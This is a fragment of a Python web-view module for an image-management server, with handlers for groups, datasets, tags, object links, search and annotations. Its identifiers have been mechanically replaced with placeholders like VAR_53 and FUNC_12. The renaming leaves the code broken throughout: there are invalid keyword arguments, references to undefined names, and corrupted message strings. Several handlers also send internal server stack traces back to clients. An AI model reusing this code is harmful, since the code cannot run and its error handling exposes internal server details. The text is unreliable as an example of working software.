if VAR_10 == "search":
for g in VAR_68:
g.loadLeadersAndMembers()
for VAR_382 in g.leaders + g.colleagues:
VAR_70[VAR_382.id] = VAR_382
VAR_70 = list(VAR_70.values())
VAR_70.sort(VAR_310=lambda x: x.getLastName().lower())
VAR_53 = {
"menu": VAR_10,
"init": VAR_61,
"myGroups": VAR_67,
"new_container_form": VAR_69,
"global_search_form": VAR_62,
}
VAR_53["groups"] = VAR_68
VAR_53["myColleagues"] = VAR_70
VAR_53["active_group"] = VAR_6.getObject("ExperimenterGroup", VAR_241(VAR_8))
VAR_53["active_user"] = VAR_6.getObject("Experimenter", VAR_241(VAR_66))
VAR_53["initially_select"] = VAR_59.initially_select
VAR_53["initially_open"] = VAR_59.initially_open
VAR_53["isLeader"] = VAR_6.isLeader()
VAR_53["current_url"] = VAR_5
VAR_53["page_size"] = settings.PAGE
VAR_53["template"] = VAR_54
VAR_53["thumbnails_batch"] = settings.THUMBNAILS_BATCH
VAR_53["current_admin_privileges"] = VAR_6.getCurrentAdminPrivileges()
VAR_53["leader_of_groups"] = VAR_6.getEventContext().leaderOfGroups
VAR_53["member_of_groups"] = VAR_6.getEventContext().memberOfGroups
return VAR_53
@login_required()
@render_response()
def FUNC_12(VAR_2, VAR_10, VAR_6=None, VAR_5=None, **VAR_7):
return FUNC_11(VAR_2=request, VAR_10=menu, VAR_6=conn, VAR_5=url, **VAR_7)
@login_required()
@render_response()
def FUNC_13(VAR_2, VAR_5=None, VAR_6=None, **VAR_7):
VAR_67 = list(VAR_6.getGroupsMemberOf())
VAR_67.sort(VAR_310=lambda x: x.getName().lower())
if VAR_6.isAdmin(): # Admin can see all VAR_68
VAR_243 = [
VAR_6.getAdminService().getSecurityRoles().userGroupId,
VAR_6.getAdminService().getSecurityRoles().guestGroupId,
]
VAR_68 = VAR_6.getObjects("ExperimenterGroup", opts={"load_experimenters": True})
VAR_68 = [g for g in VAR_68 if g.getId() not in VAR_243]
VAR_68.sort(VAR_310=lambda x: x.getName().lower())
else:
VAR_68 = VAR_67
for g in VAR_68:
g.loadLeadersAndMembers() # load VAR_63 / VAR_64
VAR_53 = {
"template": "webclient/base/includes/FUNC_13.html",
"current_url": VAR_5,
"groups": VAR_68,
"myGroups": VAR_67,
}
return VAR_53
@login_required()
def FUNC_14(VAR_2, VAR_6=None, **VAR_7):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_244 = FUNC_0(VAR_2, "member", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
try:
VAR_68 = tree.marshal_groups(
VAR_6=conn, VAR_244=member_id, VAR_87=page, VAR_88=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"groups": VAR_68})
@login_required()
def FUNC_15(VAR_2, VAR_11, VAR_6=None, **VAR_7):
try:
VAR_11 = VAR_241(VAR_11)
except ValueError:
return HttpResponseBadRequest("Invalid VAR_341 id")
try:
if VAR_11 < 0:
VAR_341 = FUNC_9(VAR_2)
else:
VAR_341 = tree.marshal_experimenter(
VAR_6=conn, VAR_11=experimenter_id
)
if VAR_341 is None:
raise Http404("No Experimenter found with ID %s" % VAR_11)
return JsonResponse({"experimenter": VAR_341})
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
@login_required()
def FUNC_16(VAR_2, VAR_6=None, **VAR_7):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_20 = FUNC_0(VAR_2, "group", -1)
VAR_11 = FUNC_0(VAR_2, "id", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not VAR_6.isValidGroup(VAR_20):
return HttpResponseForbidden("Not a member of Group: %s" % VAR_20)
VAR_71 = dict()
try:
VAR_71["projects"] = tree.marshal_projects(
VAR_6=conn,
VAR_20=group_id,
VAR_11=experimenter_id,
VAR_87=page,
VAR_88=limit,
)
VAR_71["datasets"] = tree.marshal_datasets(
VAR_6=conn,
VAR_247=True,
VAR_20=group_id,
VAR_11=experimenter_id,
VAR_87=page,
VAR_88=limit,
)
VAR_71["screens"] = tree.marshal_screens(
VAR_6=conn,
VAR_20=group_id,
VAR_11=experimenter_id,
VAR_87=page,
VAR_88=limit,
)
VAR_71["plates"] = tree.marshal_plates(
VAR_6=conn,
VAR_247=True,
VAR_20=group_id,
VAR_11=experimenter_id,
VAR_87=page,
VAR_88=limit,
)
try:
VAR_342 = VAR_2.session["server_settings"]["ui"]["tree"]["orphans"]
except Exception:
VAR_342 = {"enabled": True}
if (
VAR_6.isAdmin()
or VAR_6.isLeader(VAR_335=VAR_2.session.get("active_group"))
or VAR_11 == VAR_6.getUserId()
or VAR_342.get("enabled", True)
):
VAR_247 = tree.marshal_orphaned(
VAR_6=conn,
VAR_20=group_id,
VAR_11=experimenter_id,
VAR_87=page,
VAR_88=limit,
)
VAR_247["name"] = VAR_342.get("name", "Orphaned Images")
VAR_71["orphaned"] = VAR_247
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse(VAR_71)
@login_required()
def FUNC_17(VAR_2, VAR_6=None, **VAR_7):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_20 = FUNC_0(VAR_2, "group", -1)
VAR_245 = FUNC_0(VAR_2, "id", None)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not VAR_6.isValidGroup(VAR_20):
return HttpResponseForbidden("Not a member of Group: %s" % VAR_20)
try:
VAR_107 = tree.marshal_datasets(
VAR_6=conn, VAR_245=project_id, VAR_20=group_id, VAR_87=page, VAR_88=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"datasets": VAR_107})
@login_required()
def FUNC_18(VAR_2, VAR_6=None, **VAR_7):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_20 = FUNC_0(VAR_2, "group", -1)
VAR_246 = FUNC_0(VAR_2, "id", None)
VAR_247 = FUNC_3(VAR_2, "orphaned", False)
VAR_248 = FUNC_3(VAR_2, "sizeXYZ", False)
VAR_249 = FUNC_3(VAR_2, "thumbVersion", False)
VAR_250 = FUNC_3(VAR_2, "date", False)
VAR_11 = FUNC_0(VAR_2, "experimenter_id", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not VAR_6.isValidGroup(VAR_20):
return HttpResponseForbidden("Not a member of Group: %s" % VAR_20)
VAR_25 = "share_id" in VAR_7 and VAR_241(VAR_7["share_id"]) or None
try:
VAR_106 = tree.marshal_images(
VAR_6=conn,
VAR_247=orphaned,
VAR_11=experimenter_id,
VAR_246=dataset_id,
VAR_25=share_id,
VAR_248=load_pixels,
VAR_20=group_id,
VAR_87=page,
VAR_250=date,
VAR_249=thumb_version,
VAR_88=limit,
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"images": VAR_106})
@login_required()
def FUNC_19(VAR_2, VAR_6=None, **VAR_7):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_20 = FUNC_0(VAR_2, "group", -1)
VAR_251 = FUNC_0(VAR_2, "id", None)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not VAR_6.isValidGroup(VAR_20):
return HttpResponseForbidden("Not a member of Group: %s" % VAR_20)
try:
VAR_110 = tree.marshal_plates(
VAR_6=conn, VAR_251=screen_id, VAR_20=group_id, VAR_87=page, VAR_88=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"plates": VAR_110})
@login_required()
def FUNC_20(VAR_2, VAR_6=None, **VAR_7):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_252 = FUNC_0(VAR_2, "id", None)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if VAR_252 is None:
return HttpResponseBadRequest("id (VAR_419) must be specified")
try:
VAR_253 = tree.marshal_plate_acquisitions(
VAR_6=conn, VAR_252=plate_id, VAR_87=page, VAR_88=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"acquisitions": VAR_253})
def FUNC_21(VAR_6, VAR_12, VAR_13, VAR_14, VAR_15):
if VAR_12 == "orphaned":
return None
VAR_72 = None
if VAR_12 == "experimenter":
if VAR_14 in ["dataset", "plate", "tag"]:
return None
elif VAR_12 == "project":
if VAR_14 == "dataset":
VAR_72 = "ProjectDatasetLink"
elif VAR_12 == "dataset":
if VAR_14 == "image":
VAR_72 = "DatasetImageLink"
elif VAR_12 == "screen":
if VAR_14 == "plate":
VAR_72 = "ScreenPlateLink"
elif VAR_12 == "tagset":
if VAR_14 == "tag":
VAR_72 = "AnnotationAnnotationLink"
if not VAR_72:
raise Http404("json VAR_158 needs 'parent_type' and 'child_type'")
VAR_73 = omero.sys.ParametersI()
VAR_73.addIds(VAR_15)
VAR_74 = VAR_6.getQueryService()
VAR_75 = (
"""
from %s olink join fetch olink.child join fetch olink.parent
where olink.child.id in (:VAR_187)
"""
% VAR_72
)
if VAR_13:
VAR_73.add("pid", rlong(VAR_13))
VAR_75 += " and olink.parent.id = :pid"
VAR_76 = VAR_74.findAllByQuery(VAR_75, VAR_73, VAR_6.SERVICE_OPTS)
if VAR_13 is not None and len(VAR_76) == 0:
raise Http404(
"No VAR_344 found for %s-%s to %s-%s"
% (VAR_12, VAR_13, VAR_14, VAR_15)
)
return VAR_72, VAR_76
def FUNC_22(VAR_12, VAR_13, VAR_14, VAR_16):
if VAR_12 == "experimenter":
if VAR_14 == "dataset" or VAR_14 == "plate":
return "orphan"
if VAR_12 == "project":
VAR_254 = ProjectI(VAR_241(VAR_13), False)
if VAR_14 == "dataset":
VAR_343 = DatasetI(VAR_241(VAR_16), False)
VAR_344 = ProjectDatasetLinkI()
VAR_344.setParent(VAR_254)
VAR_344.setChild(VAR_343)
return VAR_344
elif VAR_12 == "dataset":
VAR_343 = DatasetI(VAR_241(VAR_13), False)
if VAR_14 == "image":
VAR_142 = ImageI(VAR_241(VAR_16), False)
VAR_344 = DatasetImageLinkI()
VAR_344.setParent(VAR_343)
VAR_344.setChild(VAR_142)
return VAR_344
elif VAR_12 == "screen":
VAR_383 = ScreenI(VAR_241(VAR_13), False)
if VAR_14 == "plate":
VAR_419 = PlateI(VAR_241(VAR_16), False)
VAR_344 = ScreenPlateLinkI()
VAR_344.setParent(VAR_383)
VAR_344.setChild(VAR_419)
return VAR_344
elif VAR_12 == "tagset":
if VAR_14 == "tag":
VAR_344 = AnnotationAnnotationLinkI()
VAR_344.setParent(TagAnnotationI(VAR_241(VAR_13), False))
VAR_344.setChild(TagAnnotationI(VAR_241(VAR_16), False))
return VAR_344
return None
def FUNC_23(VAR_6, VAR_14, VAR_15):
if VAR_14 == "tag":
VAR_14 = "Annotation"
VAR_77 = {}
for VAR_38 in VAR_6.getObjects(VAR_14, VAR_15):
VAR_77[VAR_38.id] = VAR_38.details.owner.id.val
return VAR_77
@login_required()
def FUNC_24(VAR_2, VAR_6=None, **VAR_7):
if VAR_2.method not in ["POST", "DELETE"]:
return JsonResponse(
{"Error": "Need to POST or DELETE JSON VAR_158 to VAR_230 links"}, VAR_313=405
)
try:
VAR_17 = json.loads(VAR_2.body)
except TypeError:
VAR_17 = json.loads(bytes_to_native_str(VAR_2.body))
if VAR_2.method == "POST":
return FUNC_25(VAR_6, VAR_17)
elif VAR_2.method == "DELETE":
return FUNC_26(VAR_6, VAR_17)
def FUNC_25(VAR_6, VAR_17, **VAR_7):
VAR_78 = {"success": False}
VAR_79 = []
VAR_80 = "WriteOwned" in VAR_6.getCurrentAdminPrivileges()
VAR_66 = VAR_6.getUserId()
for VAR_12, VAR_82 in VAR_17.items():
if VAR_12 in ("orphaned", "experimenter"):
continue
for VAR_13, children in VAR_82.items():
for VAR_14, VAR_15 in children.items():
VAR_384 = FUNC_23(VAR_6, VAR_14, VAR_15)
for VAR_16 in VAR_15:
VAR_13 = int(VAR_13)
VAR_344 = FUNC_22(VAR_12, VAR_13, VAR_14, VAR_16)
if VAR_344 and VAR_344 != "orphan":
if VAR_80 and VAR_384[VAR_16] != VAR_66:
VAR_344.details.owner = ExperimenterI(
VAR_384[VAR_16], False
)
VAR_79.append(VAR_344)
if len(VAR_79) > 0:
VAR_255 = VAR_12.title()
if VAR_255 in ["Tagset", "Tag"]:
VAR_255 = "TagAnnotation"
VAR_256 = VAR_6.getQueryService().get(VAR_255, VAR_13, VAR_6.SERVICE_OPTS)
VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_256.details.group.id.val)
VAR_0.info("api_link: Saving %s links" % len(VAR_79))
try:
VAR_6.saveArray(VAR_79)
VAR_78["success"] = True
except Exception:
VAR_0.info(
"api_link: Exception on saveArray with %s links" % len(VAR_79)
)
for VAR_344 in VAR_79:
try:
VAR_6.saveObject(VAR_344)
except Exception:
pass
VAR_78["success"] = True
return JsonResponse(VAR_78)
def FUNC_26(VAR_6, VAR_17):
VAR_78 = {"success": False}
for VAR_12, VAR_82 in VAR_17.items():
if VAR_12 == "orphaned":
continue
for VAR_13, children in VAR_82.items():
for VAR_14, VAR_15 in children.items():
VAR_385 = FUNC_21(
VAR_6, VAR_12, VAR_13, VAR_14, VAR_15
)
if VAR_385 is None:
continue
VAR_386, VAR_240 = VAR_385
VAR_387 = [VAR_71.id.val for VAR_71 in VAR_240]
VAR_0.info("api_link: Deleting %s links" % len(VAR_387))
VAR_6.deleteObjects(VAR_386, VAR_387, wait=True)
VAR_386, VAR_388 = FUNC_21(
VAR_6, VAR_12, None, VAR_14, VAR_15
)
for rl in VAR_388:
VAR_359 = rl.parent.id.val
VAR_420 = rl.child.id.val
if VAR_359 == int(VAR_13):
continue
if VAR_12 not in VAR_78:
VAR_78[VAR_12] = {}
if VAR_359 not in VAR_78[VAR_12]:
VAR_78[VAR_12][VAR_359] = {VAR_14: []}
VAR_78[VAR_12][VAR_359][VAR_14].append(VAR_420)
VAR_78["success"] = True
return JsonResponse(VAR_78)
@login_required()
def FUNC_27(VAR_2, VAR_6=None, **VAR_7):
VAR_81 = {"image": "dataset", "dataset": "project", "plate": "screen"}
VAR_82 = []
for VAR_14, VAR_12 in VAR_81.items():
VAR_187 = VAR_2.GET.getlist(VAR_14)
if len(VAR_187) == 0:
continue
VAR_15 = []
for id in VAR_187:
for VAR_318 in id.split(","):
VAR_15.append(VAR_318)
VAR_72, VAR_223 = FUNC_21(
VAR_6, VAR_12, None, VAR_14, VAR_15
)
for VAR_344 in VAR_223:
VAR_82.append(
{
"id": VAR_344.id.val,
"parent": {"type": VAR_12, "id": VAR_344.parent.id.val},
"child": {"type": VAR_14, "id": VAR_344.child.id.val},
}
)
return JsonResponse({"data": VAR_82})
@login_required()
def FUNC_28(VAR_2, VAR_6=None, **VAR_7):
try:
VAR_11 = FUNC_0(VAR_2, "experimenter", None)
VAR_245 = FUNC_0(VAR_2, "project", None)
VAR_246 = FUNC_0(VAR_2, "dataset", None)
VAR_257 = FUNC_0(VAR_2, "image", None)
VAR_251 = FUNC_0(VAR_2, "screen", None)
VAR_252 = FUNC_0(VAR_2, "plate", None)
VAR_258 = FUNC_0(VAR_2, "run", None)
VAR_258 = FUNC_0(VAR_2, "acquisition", VAR_258)
VAR_259 = VAR_2.GET.get("well", None)
VAR_260 = FUNC_0(VAR_2, "tag", None)
VAR_261 = FUNC_0(VAR_2, "tagset", None)
VAR_262 = FUNC_0(VAR_2, "roi", None)
VAR_263 = FUNC_0(VAR_2, "shape", None)
VAR_20 = FUNC_0(VAR_2, "group", None)
VAR_264 = FUNC_0(VAR_2, "page_size", settings.PAGE)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if VAR_260 is not None or VAR_261 is not None:
VAR_265 = paths_to_tag(VAR_6, VAR_11, VAR_261, VAR_260)
else:
VAR_265 = paths_to_object(
VAR_6,
VAR_11,
VAR_245,
VAR_246,
VAR_257,
VAR_251,
VAR_252,
VAR_258,
VAR_259,
VAR_20,
VAR_264,
VAR_262,
VAR_263,
)
return JsonResponse({"paths": VAR_265})
@login_required()
def FUNC_29(VAR_2, VAR_6=None, **VAR_7):
if VAR_2.method == "GET":
return FUNC_30(VAR_2, VAR_6, **VAR_7)
elif VAR_2.method == "DELETE":
return FUNC_31(VAR_2, VAR_6, **VAR_7)
def FUNC_30(VAR_2, VAR_6=None, **VAR_7):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_20 = FUNC_0(VAR_2, "group", -1)
VAR_260 = FUNC_0(VAR_2, "id", None)
VAR_11 = FUNC_0(VAR_2, "experimenter_id", -1)
VAR_247 = FUNC_3(VAR_2, "orphaned", False)
VAR_248 = FUNC_3(VAR_2, "sizeXYZ", False)
VAR_250 = FUNC_3(VAR_2, "date", False)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
try:
if VAR_260 is not None:
VAR_266 = tree.marshal_tagged(
VAR_6=conn,
VAR_11=experimenter_id,
VAR_260=tag_id,
VAR_20=group_id,
VAR_87=page,
VAR_248=load_pixels,
VAR_250=date,
VAR_88=limit,
)
else:
VAR_266 = {}
VAR_266["tags"] = tree.marshal_tags(
VAR_6=conn,
VAR_247=orphaned,
VAR_11=experimenter_id,
VAR_260=tag_id,
VAR_20=group_id,
VAR_87=page,
VAR_88=limit,
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse(VAR_266)
def FUNC_31(VAR_2, VAR_6=None, **VAR_7):
try:
VAR_267 = FUNC_2(VAR_2, "id")
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
VAR_83 = list()
VAR_84 = None
try:
for VAR_260 in VAR_267:
VAR_83.append(omero.cmd.Delete("/Annotation", VAR_260))
VAR_268 = omero.cmd.DoAll()
VAR_268.requests = VAR_83
VAR_84 = VAR_6.c.sf.submit(VAR_268, VAR_6.SERVICE_OPTS)
try:
VAR_6._waitOnCmd(VAR_84)
finally:
VAR_84.close()
except CmdError as e:
return HttpResponseBadRequest(e.message)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse("")
@login_required()
def FUNC_32(VAR_2, VAR_6=None, **VAR_7):
VAR_71 = VAR_2.GET
VAR_46 = FUNC_1(VAR_2, "image")
VAR_45 = FUNC_1(VAR_2, "dataset")
VAR_44 = FUNC_1(VAR_2, "project")
VAR_47 = FUNC_1(VAR_2, "screen")
VAR_48 = FUNC_1(VAR_2, "plate")
VAR_85 = FUNC_1(VAR_2, "acquisition")
VAR_86 = FUNC_1(VAR_2, "well")
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", VAR_1)
VAR_89 = VAR_71.get("type", None)
VAR_90 = VAR_71.get("ns", None)
VAR_91, VAR_92 = tree.marshal_annotations(
VAR_6,
VAR_44=project_ids,
VAR_45=dataset_ids,
VAR_46=image_ids,
VAR_47=screen_ids,
VAR_48=plate_ids,
VAR_85=run_ids,
VAR_86=well_ids,
VAR_89=ann_type,
VAR_90=ns,
VAR_87=page,
VAR_88=limit,
)
return JsonResponse({"annotations": VAR_91, "experimenters": VAR_92})
@login_required()
def FUNC_33(VAR_2, VAR_6=None, **VAR_7):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_244 = FUNC_0(VAR_2, "member_id", -1)
VAR_231 = FUNC_0(VAR_2, "owner_id", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
try:
VAR_112 = tree.marshal_shares(
VAR_6=conn, VAR_244=member_id, VAR_231=owner_id, VAR_87=page, VAR_88=limit
)
discussions = tree.marshal_discussions(
VAR_6=conn, VAR_244=member_id, VAR_231=owner_id, VAR_87=page, VAR_88=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"shares": VAR_112, "discussions": VAR_269})
@login_required()
@render_response()
def FUNC_34(VAR_2, VAR_18=None, VAR_19=None, VAR_6=None, **VAR_7):
VAR_93 = getIntOrDefault(VAR_2, "index", 0)
VAR_94 = dict()
if VAR_18 is not None:
if VAR_19 is not None and int(VAR_19) > 0:
VAR_94[VAR_345(VAR_18)] = VAR_241(VAR_19)
try:
VAR_104 = BaseContainer(VAR_6, **VAR_94)
except AttributeError as x:
return handlerInternalError(VAR_2, x)
VAR_95 = None
VAR_53 = {"manager": VAR_104, "form_well_index": VAR_95, "index": VAR_93}
VAR_54 = None
if "plate" in VAR_94 or "acquisition" in VAR_94:
VAR_270 = VAR_104.getNumberOfFields()
if VAR_270 is not None:
VAR_95 = WellIndexForm(VAR_115={"index": VAR_93, "range": VAR_270})
if VAR_93 == 0:
VAR_93 = VAR_270[0]
VAR_59 = VAR_2.GET.get("show")
if VAR_59 is not None:
VAR_346 = []
for w in VAR_59.split("|"):
if "well-" in w:
VAR_346.append(w.replace("well-", ""))
VAR_53["select_wells"] = ",".join(VAR_346)
VAR_53["baseurl"] = VAR_350("webgateway").rstrip("/")
VAR_53["form_well_index"] = VAR_95
VAR_53["index"] = VAR_93
VAR_53["thumbnails_batch"] = settings.THUMBNAILS_BATCH
VAR_54 = "webclient/VAR_158/VAR_419.html"
if VAR_18 == "acquisition":
VAR_53["acquisition"] = VAR_19
VAR_53["isLeader"] = VAR_6.isLeader()
VAR_53["template"] = VAR_54
return VAR_53
@login_required()
@render_response()
def FUNC_35(VAR_2, VAR_6=None, **VAR_7):
VAR_96 = []
VAR_97 = set()
VAR_98 = []
VAR_68 = {}
VAR_77 = {}
for VAR_215 in ("Project", "Dataset", "Image", "Screen", "Plate"):
VAR_154 = VAR_2.GET.get(VAR_215, None)
if VAR_154 is not None:
for o in VAR_6.getObjects(VAR_215, VAR_154.split(",")):
VAR_96.append(o.getDetails().owner.id.val)
VAR_97.add(o.getDetails().group.id.val)
VAR_96 = list(set(VAR_96))
if len(VAR_96) == 0:
VAR_96 = [VAR_6.getUserId()]
for VAR_103 in VAR_6.getObjects(
"Experimenter", VAR_96, opts={"load_experimentergroups": True}
):
VAR_271 = []
VAR_77[VAR_103.id] = VAR_103.getFullName()
for VAR_101 in VAR_103.copyGroupExperimenterMap():
VAR_68[VAR_101.parent.id.val] = VAR_101.parent
VAR_271.append(VAR_101.parent.id.val)
VAR_98.append(set(VAR_271))
VAR_99 = set.intersection(*VAR_98)
VAR_100 = VAR_6.getAdminService().getSecurityRoles().userGroupId
if VAR_100 in VAR_99:
targetGroupIds.remove(VAR_100)
if len(VAR_97) == 1:
VAR_272 = VAR_97.pop()
if VAR_272 in VAR_99:
targetGroupIds.remove(VAR_272)
def FUNC_84(VAR_101):
VAR_256 = VAR_101.getDetails().permissions
return {
"write": VAR_256.isGroupWrite(),
"annotate": VAR_256.isGroupAnnotate(),
"read": VAR_256.isGroupRead(),
}
VAR_102 = []
for VAR_335 in VAR_99:
VAR_102.append(
{"id": VAR_335, "name": VAR_68[VAR_335].name.val, "perms": FUNC_84(VAR_68[VAR_335])}
)
VAR_102.sort(VAR_310=lambda x: x["name"])
VAR_77 = [[VAR_413, VAR_414] for VAR_413, VAR_414 in VAR_77.items()]
return {"owners": VAR_77, "groups": VAR_102}
@login_required()
@render_response()
def FUNC_36(VAR_2, VAR_20, VAR_21, VAR_6=None, **VAR_7):
VAR_6.SERVICE_OPTS.setOmeroGroup(int(VAR_20))
VAR_103 = getIntOrDefault(VAR_2, "owner", None)
VAR_104 = BaseContainer(VAR_6)
VAR_104.listContainerHierarchy(VAR_103)
VAR_54 = "webclient/VAR_158/chgrp_target_tree.html"
VAR_53 = {"manager": VAR_104, "target_type": VAR_21, "template": VAR_54}
return VAR_53
@login_required()
@render_response()
def FUNC_37(VAR_2, VAR_22=None, VAR_6=None, **VAR_7):
VAR_104 = BaseSearch(VAR_6)
VAR_105 = []
VAR_71 = VAR_2.GET
if VAR_22 is not None:
VAR_273 = VAR_71.get("query", None)
if VAR_273 is None:
return HttpResponse("No search '?query' included")
VAR_273 = query_search.replace("+", " ")
VAR_274 = toBoolean(VAR_71.get("advanced"))
if VAR_274:
VAR_273 = VAR_71.get("advanced_search")
VAR_54 = "webclient/search/search_details.html"
VAR_275 = VAR_71.getlist("datatype")
VAR_270 = VAR_71.getlist("field")
VAR_276 = VAR_71.get("searchGroup", None)
VAR_277 = VAR_71.get("ownedBy", None)
VAR_278 = toBoolean(VAR_71.get("useAcquisitionDate"))
VAR_279 = VAR_71.get("startdateinput", None)
VAR_279 = VAR_279 is not None and smart_str(VAR_279) or None
VAR_280 = VAR_71.get("enddateinput", None)
VAR_280 = VAR_280 is not None and smart_str(VAR_280) or None
VAR_250 = None
if VAR_279 is not None:
if VAR_280 is None:
VAR_389 = datetime.datetime.now()
VAR_280 = "%s-%02d-%02d" % (VAR_389.year, VAR_389.month, VAR_389.day)
VAR_250 = "%s_%s" % (VAR_279, VAR_280)
if len(VAR_275) == 0:
VAR_275 = ["images"]
VAR_104.search(
VAR_273,
VAR_275,
VAR_270,
VAR_276,
VAR_277,
VAR_278,
VAR_250,
rawQuery=VAR_274,
)
VAR_281 = re.compile(r"^[\VAR_362 ,]+$")
if VAR_281.search(VAR_273) is not None:
VAR_6.SERVICE_OPTS.setOmeroGroup(-1)
VAR_347 = set()
for queryId in re.split(" |,", VAR_273):
if len(queryId) == 0:
continue
try:
VAR_421 = VAR_241(queryId)
if VAR_421 in VAR_347:
continue
VAR_347.add(VAR_421)
for VAR_431 in VAR_275:
VAR_431 = VAR_431[0:-1] # remove 's'
if VAR_431 in (
"project",
"dataset",
"image",
"screen",
"plate",
"well",
):
VAR_38 = VAR_6.getObject(VAR_431, VAR_421)
if VAR_38 is not None:
VAR_105.append({"otype": VAR_431, "obj": VAR_38})
except ValueError:
pass
else:
VAR_54 = "webclient/search/search.html"
VAR_53 = {
"manager": VAR_104,
"foundById": VAR_105,
"resultCount": VAR_104.c_size + len(VAR_105),
}
VAR_53["template"] = VAR_54
VAR_53["thumbnails_batch"] = settings.THUMBNAILS_BATCH
return VAR_53
@login_required()
@render_response()
def FUNC_38(VAR_2, VAR_23, VAR_24, VAR_6=None, VAR_25=None, **VAR_7):
VAR_93 = getIntOrDefault(VAR_2, "index", 0)
VAR_53 = dict()
VAR_106 = VAR_23 == "image" and list(VAR_6.getObjects("Image", [VAR_24])) or list()
VAR_107 = (
VAR_23 == "dataset" and list(VAR_6.getObjects("Dataset", [VAR_24])) or list()
)
VAR_108 = (
VAR_23 == "project" and list(VAR_6.getObjects("Project", [VAR_24])) or list()
)
VAR_109 = VAR_23 == "screen" and list(VAR_6.getObjects("Screen", [VAR_24])) or list()
VAR_110 = VAR_23 == "plate" and list(VAR_6.getObjects("Plate", [VAR_24])) or list()
VAR_111 = (
VAR_23 == "acquisition"
and list(VAR_6.getObjects("PlateAcquisition", [VAR_24]))
or list()
)
VAR_112 = (
(VAR_23 == "share" or VAR_23 == "discussion")
and [VAR_6.getShare(VAR_24)]
or list()
)
VAR_113 = VAR_23 == "well" and list(VAR_6.getObjects("Well", [VAR_24])) or list()
VAR_114 = {
"images": VAR_23 == "image" and [VAR_24] or [],
"datasets": VAR_23 == "dataset" and [VAR_24] or [],
"projects": VAR_23 == "project" and [VAR_24] or [],
"screens": VAR_23 == "screen" and [VAR_24] or [],
"plates": VAR_23 == "plate" and [VAR_24] or [],
"acquisitions": VAR_23 == "acquisition" and [VAR_24] or [],
"wells": VAR_23 == "well" and [VAR_24] or [],
"shares": ((VAR_23 == "share" or VAR_23 == "discussion") and [VAR_24] or []),
}
VAR_115 = {
"selected": VAR_114,
"images": VAR_106,
"datasets": VAR_107,
"projects": VAR_108,
"screens": VAR_109,
"plates": VAR_110,
"acquisitions": VAR_111,
"wells": VAR_113,
"shares": VAR_112,
}
VAR_116 = None
VAR_117 = None
if VAR_23 in ("share", "discussion"):
VAR_54 = "webclient/annotations/annotations_share.html"
VAR_104 = BaseShare(VAR_6, VAR_24)
VAR_104.getAllUsers(VAR_24)
VAR_104.getComments(VAR_24)
VAR_116 = CommentAnnotationForm(VAR_115=initial)
else:
try:
VAR_104 = BaseContainer(VAR_6, **{VAR_345(VAR_23): VAR_241(VAR_24), "index": VAR_93})
except AttributeError as x:
return handlerInternalError(VAR_2, x)
if VAR_25 is not None:
VAR_54 = "webclient/annotations/annotations_share.html"
